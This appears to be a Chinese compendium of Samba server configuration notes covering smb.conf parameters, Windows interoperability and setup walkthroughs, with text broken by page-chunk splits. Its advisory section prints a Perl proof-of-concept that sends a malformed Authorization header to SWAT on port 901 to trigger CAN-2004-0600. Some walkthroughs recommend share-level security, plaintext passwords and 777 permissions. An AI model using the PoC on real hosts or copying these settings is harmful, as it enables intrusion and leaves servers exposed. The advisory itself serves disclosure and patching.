Samba服务器配置资料大全.docx

1、Samba服务器配置资料大全Samba服务器配置资料大全目录Samba服务器配置资料大全 11 Samba服务器配置文件 21.1 (1) 全局参数 21.2 (2) 资源共享的选项 51.3 (3) 特殊变量 71.4 文件实例: 72 Samba 3.x SWAT预验证远程缓冲区溢出漏洞 83 Samba和Windows 的密码处理认证方式 104 linuxwindows互联实战经历 105 Samba3.0服务器实战调试 126 SMB的扩展应用 167 Smaba配置文件详细分析（二） 221 Samba服务器配置文件/etc/samba/smb.conf功能: 设置samba服务器

2、选项和共享资源的设置文件格式: #说明语句global /定义samba服务器的全局选项全局参数=值 homes /共享用户主目录资源共享参数=值 printers / 打印机共享资源共享参数=值 public /共享目录设置资源共享参数=值以上声明为系统自带的声明，用户也可以根据实际需要定义共享目录： 自定义 /自定义的共享资源共享参数=值说明：1.1 (1) 全局参数 基本全局参数：Workgroup=域名/工作组名功能：设定samba服务器所属工作组/域的名称)Netbios name=主机名称功能：设置samba服务器的netbios名称Server string=字符串功能：设置sa

3、mba服务器的描述interfaces=接口名/ip地址功能：设置samba服务器的ip地址，如果不想使用默认IP地址或者想同时使用多个IP地址，可以设置这个选项client code page=850/936功能:设定客户端存取samba服务器的资源时所使用的字符编码表实例:client code page=936安全设置参数：admin users=用户名 功能：设置管理员账号socket address=ip地址功能：指定samba服务器监听的ip地址security=user/share/domain/server功能：设置samba的共享安全级别注意：share /表示共享级访问，服

4、务器不对客户机进行身份验证 user /表示用户级访问server /表示服务器级访问，被访问的samba服务器请求另一台samba服务器对客户机进行身份验证domain /表示域级访问，由域控制器对客户机进行身份验证 password server=ip址址/主机名功能：指定密码服务器的位置，当security值为server/domain必须设置该参数 encrypt passwords=yes/no功能：指定是否使用加密口令注意：对于windows客户机来说，该选项应该设置为yesrestrict anonymous=true/false功能：指定服务器是否允许win NT/2000以匿

5、名方式登录实例：restrict anonymous=false smb passwd file=文件路径功能：指定samba用户密码的文件位置实例：smb passwd file=/etc/samba/smbpasswdmap to guest=never/bad user/bad password功能：设置当用户所输入的用名和密码不正确时的处理方式注意：该选项只有security=share时才有效，该选项可以取以下三种值：never 表示拒绝使用任何资源bad user 表示用户输入用户名正确，但密码错误时,可以允许以guest登录bad password 表示用户输入的用户名和口令都错

6、误时，可以允许以guest登录username map=文件路径功能：指定SMB用户名与LINUX用户名映射文件的路径实例：username map=/etc/samba/smbusers guest account=用户名功能：指定来宾账号的名称，默认为nobody hosts allow= ip地址/主机名域名 功能：设置允许访问的客户机hosts deny=ip地址/主机名域名功能：设置禁止访问的客户机打印机设置参数：printcap name=路径功能：设定打印机的配置文件的位置实例：printcap name=/etc/printcapload printers =yes/no功能：

7、设定是否自动装载打印机的装载文件,当要做打印服务器时必须设置为yesprinting = /cups/bsd/lprng/sysv功能：设置打印机相关指令时所采取的模式实例:printing=lprngprinter name=名称功能:设置打印机的名称日志设置参数: log file=路径功能:定义日志文件的位置实例:log file=/var/log/samba/%m.logmax log size=数字功能:定义日志文件的最大千字节运行效率参数:change notify timeout=数字功能:设置服务器周期性异常通知实例:change notify timeout=90deadti

8、me=数字功能:客户端无操作多少分钟后服务器中断连接实例:deadtime=10getwd cache=yes/no功能:是否启用cache功能keepalive=数字功能:服务器每隔多少秒向客户端发送keepalive包用于确认客户端是否工作正常max open files=数字功能:同一个客户端最多能打开的文件数目实例:max open files=1000wins设置参数:wins support=yes/no功能:是否支持wins解析实例:wins support=yeswins server=服务器功能:指定wins服务器的位置实例:wins server=192.168.0.2wi

9、ns proxy=yes/no 功能:设置samba服务器是否支持wins代理功能实例:wins proxy=yes1.2 (2) 资源共享的选项基本参数 : comment=说明语句 功能:对共享资源的说明path=路径功能:共享资源的路径访问控制参数: browseable=yes/no功能:是否可以浏览共享目录,默认为yesprintable =yes/no功能:设置客户机是否可以使用共享打印机打印avalidable=yes/no功能:设置共享资源是否可用实例:avalidable=yespublic=yes/no功能:设置共享资源是否允许所有用户访问,除guest用户以外guest

10、ok =yes/no功能:设置是否允许guest用户访问共享资源guest only=yes/no功能:设置共享目录只允许guest用户访问read only=yes/no功能:访问用户对共享资源只读valid users=用户名/组名功能:设定指定允许访问共享资源的用户/组,多用户名用逗号分开,指定组时要在组名前加实例:valide users=u1,u2,g1invalid users=用户名/组名功能:设定指定禁止访问共享资源的用户/组,多用户名用逗号分开,指定组时要在组名前加create mode=权限值功能:指定客户机在共享目录中创建文件的默认权限,默认权限为744directory

11、 mode =0775功能:指定客户机共享目录中创建文件目录的默认权限,默认权限为755writable=yes/no功能:指定共享的路径是否可写write list=用户名/组名功能:设定允许读写共享目录的用户列表实例:write list=abc,g2read list=用户名/组名功能:设定只读访问用户列表实例:read list=abc,cuo自动执行参数：preexec=路径功能:指定客户机连接时要自动执行文件postexec=路径功能:指定客户机断开连接时要自动执行的文件root preexec=路径功能: 指定客户机连接时要以ROOT用户身份自动执行的文件实例:root pree

12、xec=/bin/mount /dev/cdromroot postexec=路径功能:指定客户机断开连接时要以ROOT用户身份自动执行的文件实例:root postexec=/bin/umount /dev/cdrom1.3 (3) 特殊变量 %S（大写）: 当前服务名 %P（大写）: 当前服务的根目录 %u: 当前服务的用户名 %h: samba服务器的主机名 %m: 客户机的NETBIOS名 %L samba服务器的netbios名%v samba版本号%g 给定%u的所在的主工作组名%H 给定的%u的宿主目录%T 当前日期和时间1.4 文件实例:根据以下要求/etc/samba/smb

13、.conf文件: 设置samba服务器的工作组名为linuxgroup,NETBIOS名为linux 设置samba服务器的访问模式为share 共享/soft目录,共享名为soft,该共享目录允许所有的用户读写操作#vi /etc/samba/smb.conf修改内容如下: global Workgroup=linuxgroup Netbios name=linux Security=share homes printers soft /添加如下这个声明comment=applic soft sharedpath=/softbrowseable=yeswritable=yesguest ok

14、=yespublic=yes2 Samba 3.x SWAT预验证远程缓冲区溢出漏洞严重程度：高威胁程度：远程管理员权限错误类型：边界检查错误利用方式：服务器模式CVE(CAN) ID：CAN-2004-0600受影响系统Samba 3.0.2 Samba 3.0.3 Samba 3.0.4详细描述SWAT是Samba Web管理工具。 Samba SWAT服务预验证存在缓冲区溢出问题，远程攻击者可以利用这个漏洞在系统上以SWAT进程权限执行任意指令。问题存在于source/lib/util_str.c文件中的进行HTTP Basic验证的base64_decode_data_blob函数中.

15、测试代码#!/usr/bin/perl# Samba 3.0.4 and priors SWAT Authorization Buffer Overflow# Created by Noam Rathaus of Beyond Security Ltd.#use IO:Socket;use strict;my $host = $ARGV0;my $remote = IO:Socket:INET-new ( Proto = tcp, PeerAddr = $host, PeerPort = 901 );unless ($remote) die cannot connect to http dae

16、mon on $host print connectedn;$remote-autoflush(1);my $http = GET / HTTP/1.1rHost: $host:901rUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 Firefox/0.9.1rAccept: text/xmlrAccept-Language: en-us,en;q=0.5rAccept-Encoding: gzip,deflaterAccept-Charset: ISO-8859-1,utf-8;q=0.7,

17、*;q=0.7rKeep-Alive: 300rConnection: keep-aliverAuthorization: Basic =rr;print HTTP: $httpn;print $remote $http;sleep(1);print Sentn;while ()print $_;print n;close $remote;解决方案下载升级程序：Samba 3.0.5：http:/www.samba.org/samba/whatsnew/samba-3.0.5.htm相关信息3 Samba和Windows 的密码处理认证方式 因为两者的密码处理认证方式不同，所以导致输入正确的密

18、码时还是无法通过。 以 Windows 98 来说，系统预设是使用 encrypt 编码的方式，而 samba则是预设使用 text 明码的方式。所以说解决的方式有: 方法一: 把 smb.conf 档案内的 encrypt passwords 改成 = yes : encrypt passwords = yes smb passwd file = /etc/smbpasswd 然后使用 smbpasswd -a xxxx 建立主机上 xxxx user 的 存取密码。往后 windows 98 就使用这个密码即可。 请注意你改的登录要先恢复原状。此方式使用编码的密码 方式来存取。 方法二:

19、找 /usr/doc/sambaX-XXXX/docs 目录的 .reg 登录档案， 在 windows 98 把该档案汇入系统后即可。让大家是是使用 为明码的方式来存取即可。 4 linuxwindows互联实战经历 本人刚连接完linux和windows98、me、2000、2kserver互联实践，走了不少弯路，现将一些感想和本人所碰到的一些故障现象作一下笔记，以方便初手： 一、samba 首先要知道samba是一组 程序，他让你的linux机器懂得smb协议。在运行samba服务器程序的时候，你的linux机器在网络邻居中看起来如同一台windows的机器。 二、我的配置过程 1、修改

20、smb.conf 我选的是系统默认安装的samba，但系统启动完后，发现samba没有启动，（#ps -axf | grep smb），手动启动（#/etc/rc.d/init.d/smb restart） 修改 /etc/samba/smb.conf 有些书上说是/etc/smb.conf 我也不知道为什么，可能是版本差异吧。 我就修改了 global组的： workgroup = JD (我的工作组名是JD） netbios name = vmlinux security = user (采用用户方式验证） encrypt passwords = no (我采用的是明文密码验证） smb

21、passwd file = /etc/smbpasswd (设置smb密码文件的位置） public (把public组前面的“；”全拿掉 path = /pub (共享pub目录） 我就修改了这些，其他就是把#开头的段全删了（碍眼） 2、添加相应目录和用户 #mkdir pub (添加/pub目录） #adduser test (添加test用户)注：现在添加的只是linux本机用户，并没用添加smb用户，换句话说，test现在不能通过网络访问这台linux主机。 #passwd test (设置test用户密码） #vi /etc/passwd (把一些你不用或者你不知道的用户全删了） #

22、 cat /etc/passwd | mksmbpasswd.sh /etc/smbpasswd （把linux本机用户加到smb用户里去） #smbpasswd test (设置test用户的smb访问口令） #/etc/rc.d/init.d/smb restart (重启samba） ok ，linux主机上我就设了这些，下面开始测试 2、测试linux smb（在本机上测试） #smbclient -L /vmlinux (先用smbclient测试本机smb是否工作正常，应能看到/root /public这些目录） #smbclient vmlinuxroot (现在连接目录，提示输

23、入密码，你自己知道） 这样的话，linux机器互访应该没问题了。 注意：#vi /etc/hosts (添加win98me2000机器的ip和主机名，看看有没有自己的，没有的话也填上） 测试windows的机器前先 找到/usr/share/doc/sambaX-XXXX/docs 下*.reg文件 导入windows的机器,我发现这个还能解决win2000的机器互访winme、98时常常出现的怪病，现在2k和98在局域网里访问都正常的要死。 3、测试win98、me 现在能在win98 、me的网上邻居里看到linux机器名了，点击，倒，什么？提示要什么IPC$密码！ 解决方法：控制面板用户

24、密码添加test用户(刚才在smb里面添加的那个用户）重启，用这个用户名登陆，现在再访问，应该没问题了（至少我是ok了） 4、测试win2000 1台(win2k1)提示：请输入用户名和密码（然后你打什么用户名和密码都没用） 另一台（win2k2)提示：此账户未得到从这个工作站登陆的许可 再倒！ 解决方法：发现win2000虽然是用的test用户名和密码，但是现在登陆在win2000的域里，我在win2000本机里添加test用户，然后用test登陆本机，访问linux机器，现在正常了。5 Samba3.0服务器实战调试fedora预装的samba已经是samba-3.0.0-15,功能已经非

25、常强大了，今天我们调试的重点不是samba3.0的新功能，我们还是先来实现他的基本功能，文件共享服务，至于域控制器功能我会在以后的调试手记中阐述。我们今天要实现的环境是，假如公司有财务，技术，领导3个部门，我们分别为3个部门建立3个用户组为caiwu,network,lingdao;三个部门里各有2个用户，我们建用户分别为caiwu01,caiwu02,network01,network02,lingdao01,lingdao02然后我们分别就公司的具体情况建立相应的目录及访问权限，通过以下的例子，希望大家能在平时的工作中灵活的应用samba的安全权限来设置你们的samba文件服务器。1。首先

26、服务器采用用户验证的方式，每个用户可以访问自己的宿主目录，并且只有该用户能访问宿主目录，并具有完全的权限，而其他人不能看到你的宿主目录。2。建立一个caiwu的文件夹，希望caiwu组和lingdao组的人能看到，network02也可以访问，但只有caiwu01有写的权限。3。建立一个lindao的目录，只有领导组的人可以访问并读写，还有network02也可以访问，但外人看不到那个目录4。建议一个文件交换目录exchange，所有人都能读写，包括guest用户，但每个人不能删除别人的文件。5。建议一个公共的只读文件夹public，所有人只读这个文件夹的内容。好，我们先来前期的工作#grou

27、padd caiwu#groupadd network#groupadd lingdao#useradd caiwu01 -g caiwu#useradd caiwu02 -g caiwu#useradd network01 -g network#useradd network02 -g network#useradd lingdao01 -g lingdao#useradd lingdao02 -g lingdao然后我们使用smbpasswd -a caiwu01的命令为6个帐户分别添加到samba用户中#mkdir /home/samba#mkdir /home/samba/caiwu#

28、mkdir /home/samba/lingdao#mkdir /home/samba/exchange#mkdir /home/samba/public我们为了避免麻烦可以在这里把上面所有的文件夹的权限都设置成777，我们通过samba灵活的权限管理来设置上面的5点要求。以下是我的smb.conf的配置文件globalworkgroup = bmit#我的网络工作组server string = Franks Samba File Server#我的服务器名描述security = user#使用用户验证机制encrypt passwords = yessmb passwd file = /

29、etc/samba/smbpasswd#使用加密密码机制，在win95和winnt使用的是明文其他的基本上可以按照默认的来。homescomment = Home Directoriesbrowseable = nowritable = yesvalid users = %Screate mode = 0664directory mode = 0775#homes段满足第1条件caiwucomment = caiwupath = /home/samba/caiwupublic = novalid users = caiwu,lingdao,network02write list = caiwu01printable = no#caiwu段满足我们的第2要求lingdaocomment = lingdaopath = /home/samba/lingdaopublic = nobrowseable = novalid users = lingdao,network02printable = no#lingdao段能满足我们的第3要求exchagecomment = Exchange File Directo